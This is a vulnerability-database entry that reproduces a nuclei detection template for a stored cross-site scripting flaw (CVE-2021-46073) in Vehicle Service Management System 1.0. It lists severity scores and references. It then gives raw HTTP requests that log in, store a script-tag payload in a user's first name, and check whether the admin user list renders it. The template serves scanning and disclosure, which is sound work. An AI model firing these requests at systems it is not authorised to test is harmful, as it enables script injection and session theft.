nuclei | ProjectDiscovery | NUCLEI:CVE-2021-46073
History: Aug 31, 2022 - 4:30 p.m.

Vehicle Service Management System 1.0 - Cross Site Scripting

2022-08-31 16:30:59
ProjectDiscovery
github.com

CVSS2: 3.5 Low
Attack Vector: NETWORK
Attack Complexity: MEDIUM
Authentication: SINGLE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3: 4.8 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

EPSS: 0.001 Low
Percentile: 44.4%

Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in the login panel.

id: CVE-2021-46073

info:
  name: Vehicle Service Management System 1.0 - Cross Site Scripting
  author: TenBird
  severity: medium
  description: |
    Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
    - https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46073
    - https://github.com/SYRTI/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2021-46073
    cwe-id: CWE-79
    epss-score: 0.0011
    epss-percentile: 0.4404
    cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: vehicle_service_management_system_project
    product: vehicle_service_management_system
  tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project

http:
  - raw:
      - |
        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}
      - |
        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
      - |
        GET /vehicle_service/admin/?page=user/list HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(header_3, 'text/html')"
          - "status_code_3 == 200"
          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
        condition: and
# digest: 4b0a00483046022100a96d3af0aac3b22cd69738643941944444daba57a4d989ce5bad7797f69df3bd022100d25c9a88345d256148db9c2175d9f6a21773358cac529a6971408ffd89bd2bfd:922c64590222798bb761d5b6d8e72950
